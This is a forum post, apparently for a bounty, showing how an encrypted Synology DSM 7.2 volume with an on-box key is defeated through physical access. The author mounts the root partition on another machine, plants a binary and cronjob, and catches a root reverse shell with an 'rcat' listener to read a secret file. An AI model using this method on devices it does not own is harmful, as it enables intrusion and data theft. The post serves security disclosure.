[Bounty] First person to share how to break into DSM 7.2 Encryption keys (stored on box) gets a DS923+

I just noticed that my initial test was actually on the RC version. Nevertheless, I now did the full test with a single disk, on the actual release version (not the RC). I set up a new system on DSM 7.2-64561 on a single drive (JBOD). The volume is encrypted and using ext4, with the local key vault. I powered off the disk station and connected the drive to an external kubuntu system. There I was able to see all 3 partitions (root, swap, volume):

interestingly, Synology seems to be using luks2 under the hood (can’t attach 2 screenshots in one post, but the encrypted volume is a luks2 volume).

/dev/sdb1 is the root volume in this case, which is mountable by:

$ sudo mount -t ext4 /dev/sdb1 /mnt
$ ls /mnt
bin  config  dev  etc  etc.defaults  initrd  lib  lib32  lib64  lost+found  mnt  proc  root  run  sbin  sys  tmp  usr  var  var.defaults  volume1

Now, I proceeded like in my first write-up. After I was done (with the slight change that the binary was now under /bin since /opt was missing on this fresh system), I unmounted with umount -l /mnt .

Next, I plugged in the drive into my DS918+, and it started up just fine and connected to my shell listener (aside from me having a typo in the cronjob, which I had to first fix :wink: ).

Then, the secret test file (/volume1/A/secret.txt) is available:

❯ ./rcat-v3.0.0-linux-x86_64 listen -ib 55600
info: Listening on
info: Connection Recived
bash: cannot set terminal process group (11023): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4# ls /volume1/
bash-4.4# ls /volume1/A
bash-4.4# cat /volume1/A/secret.txt 